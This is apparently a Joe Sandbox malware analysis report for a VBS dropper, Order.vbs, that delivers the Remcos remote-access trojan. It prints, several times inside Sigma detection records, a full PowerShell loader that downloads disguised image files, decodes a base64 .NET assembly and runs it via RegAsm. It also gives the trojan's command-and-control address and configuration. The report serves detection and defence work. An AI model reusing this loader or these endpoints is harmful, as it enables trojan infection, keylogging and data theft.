k#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T
              Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", ProcessId: 2420, ProcessName: wscript.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", ProcessId: 2420, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7780, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Sigma detected: Powershell download and load assembly
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:05:22.970205+020020204231Exploit Kit Activity Detected185.199.108.133443192.168.2.649789TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:05:22.970205+020020204251Exploit Kit Activity Detected185.199.108.133443192.168.2.649789TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:05:24.318537+020020365941Malware Command and Control Activity Detected192.168.2.649805154.216.17.1415922TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:05:19.370699+020020490381A Network Trojan was detected52.217.161.161443192.168.2.649764TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-21T17:05:25.552751+020028033043Unknown Traffic192.168.2.649812178.237.33.5080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.17.141:5922:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MBKA6A", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for submitted file
              Source: Order.vbsReversingLabs: Detection: 13%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042B1E6 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_0042B1E6
              Source: RegAsm.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.161.161:443 -> 192.168.2.6:49764 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49789 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_004081F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004072E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00407733
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,8_2_00414795
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00440A59 FindFirstFileExA,8_2_00440A59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00404CF3 FindFirstFileW,FindNextFileW,8_2_00404CF3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00405C8E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_00407FDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_0040511A

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49805 -> 154.216.17.141:5922
              Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.199.108.133:443 -> 192.168.2.6:49789
              Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.199.108.133:443 -> 192.168.2.6:49789
